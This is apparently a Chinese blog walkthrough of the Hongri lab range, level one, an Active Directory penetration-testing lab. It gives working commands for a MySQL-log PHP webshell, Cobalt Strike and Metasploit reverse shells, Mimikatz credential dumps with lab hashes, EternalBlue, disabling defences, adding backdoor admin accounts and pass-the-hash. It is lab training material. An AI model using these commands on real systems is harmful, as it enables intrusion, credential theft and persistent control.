红日靶场第一关

红日靶场第一关

一、环境配置

NET网卡(kali、windows)
kali:172.16.12.187
windows:172.16.12.1
靶机win7:172.16.12.127
VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2)
内网靶机Win2K3:192.168.52.141
内网靶机Win2008 R2:192.168.52.138
内网靶机win7:192.168.52.163

二、目标

一、环境搭建
1.环境搭建测试
2.信息收集
二、漏洞利用
3.漏洞搜集与利用
4.后台Getshell上传技巧
5.系统信息收集
6.主机密码收集
三、内网收集
7.内网——继续信息收集
8.内网攻击姿势——信息泄露
9.内网攻击姿势——MS08-067
10.内网攻击姿势——SMB远程桌面口令猜测
11.内网攻击姿势——Oracle数据库TNS服务漏洞
12.内网攻击姿势——RPC DCOM服务漏洞
四、横向移动
13.内网其他主机端口——文件读取
14.内网其他主机端口——redis
15.内网其他主机端口——redis Getshell
16.内网其他主机端口——MySQL数据库
17.内网其他主机端口——MySQL提权
五、构建通道
18.内网其他主机端口——代理转发
六、持久控制
19.域渗透——域成员信息收集
20.域渗透——基础服务弱口令探测及深度利用之powershell
21.域渗透——横向移动[wmi利用]
22.域渗透——C2命令执行
23.域渗透——利用DomainFronting实现对beacon的深度隐藏
24.域渗透——域控实现与利用
七、痕迹清理
25、日志清理

三、WEB外网打点

3.1 日志文件Getshell

访问网站:

在这里插入图片描述

猜解MySQL数据库连接检测:(root/root)

在这里插入图片描述

目录扫描dirsearch(phpmyadmin):
在这里插入图片描述

直接写入木马到网站的根目录,写入失败(需要修改 MySQL 配置才行)。所以可以采用MySQL日志导入木马。

查看日志状态:
  show variables like '%general%';
开启general_log为True:
  SET GLOBAL general_log='on';
执行命令指定日志写马:
  SET GLOBAL general_log_file='C:/phpStudy/www/1.php';
写入一句话到马中:
  SELECT '<?php eval($_POST["cmd"]);?>';

访问日志文件:

在这里插入图片描述

冰蝎/蚁剑/菜刀连接:

在这里插入图片描述

3.2 后台文件上传getshell

yxcms模板:

在这里插入图片描述

登录后台后——前台模板——新建:(写入木马)连接即可。

在这里插入图片描述通过代码审计或目录遍历漏洞,寻找到上传路径:
在这里插入图片描述
连马即可getshell。

四、内网信息收集

4.1 上线CS

管理员启动命令行:teamserver 172.16.12.1 123456

攻击——生成后门——windowsExecutable(S)——用冰蝎\蚁剑上传服务器——运行

上线CS成功:
在这里插入图片描述

4.2 基本内网信息收集

4.2.1 Mimikatz工具抓取本机用户名密码:

在这里插入图片描述

4.2.2 提权SYSTEM用户

在这里插入图片描述

4.2.3 内网收集命令
net view                 #查看局域网内其他主机名
net config Workstation   #查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 #查看本机用户列表
net user /domain         #查看域用户
net localgroup administrators #查看本地管理员组(通常会有域用户)
net view /domain         #查看有几个域
net user 用户名 /domain   #获取指定域用户的信息
net group /domain#查看域里面的工作组,查看把用户分了多少组(域控上操作)
net group 组名 /domain    #查看域中某工作组
net group "domain admins" /domain  #查看域管理员的名字
net group "domain computers" /domain  #查看域中的其他主机名
net group "doamin controllers" /domain  #查看域控制器主机名
1.判断是否存在域

shell ipconfig /all(SYSTEM)

在这里插入图片描述

shell net config Workstation(Administrator)

在这里插入图片描述

2.判断是否存在多个域

shell net view /domain

在这里插入图片描述

3.确认域控主机名称

shell net group “domain controllers” /domain

在这里插入图片描述

4.查看域内其他主机信息

shell net view
在这里插入图片描述

5.判断其余主机是否存在域内

shell net group “domain computers” /domain

在这里插入图片描述

五、横向渗透

(永恒之蓝)

5.1 联动MSF监听

MSF开启监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost MSFIP地址(172.16.12.187)
set lport 6666
exploit

CS开启监听:

在这里插入图片描述

增加会话,选择MSF:

在这里插入图片描述

5.2 判断陷阱

查看监听当前目录: ls
判断靶机是否进入蜜罐:run post/windows/gather/checkvm
列举安装程序:run post/windows/gather/enum_applications

5.3 静态路由配置

MSF 的 autoroute 模块是 MSF 框架中自带的一个路由转发功能,实现过程是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往“内网”的路由,直接使用 MSF 去访问原本不能直接访问的内网资源,只要路由可达我们既可使用 MSF 来进行探测了。
#加载MSFautoroute模块,探测当前机器所有网段信息
meterpreter > run post/multi/manage/autoroute
#添加目标内网路由
meterpreter > run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD

5.4 内网继续信息收集

5.4.1 扫描域内其他主机开放的端口
(扫描靶机2008R2)
msf6>use auxiliary/scanner/portscan/tcp
msf6>set rhost 192.158.52.141
msf6>set ports 80,135-139,445,3306,3389
msf6>run
5.4.2 扫描漏洞
msf6>search ms17_010msf6>use auxiliary/scanner/smb/smb_ms17-010msf6>set rhosts 192.168.52.141msf6>run
5.4.3 关闭跳板机win7防火墙
msf6>sessions -l #查看所有绘画msf6>sessions 4 #进入会话4中netsh advfirewall set allprofiles state off #关闭防火墙net stop windefend #关闭windows defender
5.4.4 永恒之蓝
use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcpset rhosts 192.168.52.138run

在这里插入图片描述

(3389远程)

开启靶机win7远程桌面MSF:run post/windows/manage/enable_rdpwindows:# win7开启3389REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f# 添加账户密码net user Tr0e Pass!@123 /add# 给Tr0e账户添加为管理员权限net localgroup administrators Tr0e /add# 查询是否成功添加 Tr0e 用户net user Tr0e# 添加防火墙规则netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

连接用户名 GOD\Administrator 密码cllmsyK123

在这里插入图片描述

(MSF哈希传递攻击PTH)

5.5 Hash传递攻击

【哈希传递攻击】在 kerberos、NTLM 认证过程的关键,首先就是基于用户密码 Hash 的加密,所以在域渗透中,无法破解用户密码 Hash 的情况下,也可以直接利用 Hash 来完成认证,达到攻击的目的,这就是 hash 传递攻击(Pass The Hash,简称 PTH)。如果内网主机的本地管理员账户密码相同,那么可以通过 PTH 远程登录到任意一台主机,操作简单、威力无穷。在域环境中,利用哈希传递攻击的渗透方式往往是这样的:    1.获得一台域主机的权限,Dump 内存获得该主机的用户密码 Hash 值;    2.通过哈希传递攻击尝试登录其他主机;    3.继续搜集 Hash 并尝试远程登录,直到获得域管理员账户 Hash,登录域控,最终成功控制整个域。

在这里插入图片描述

msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : GOD
	 * LM       : 63b1e629a4f9202f82fbc0049075c50d
	 * NTLM     : 9d0ba28e4fcf08d74bf61b4d50c46474
	 * SHA1     : e2b817228b94e9bec7e979516b98b604880ad5a8
	tspkg :	
	 * Username : Administrator
	 * Domain   : GOD
	 * Password : cllmsyK

5.6 MSF

use exploit/windows/smb/psexec
set rhosts 192.168.52.138
set smbuser Administrator
set smbdomain GOD
set smbpass 00000000000000000000000000000000:9d0ba28e4fcf08d74bf61b4d50c46474
run

在这里插入图片描述

  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值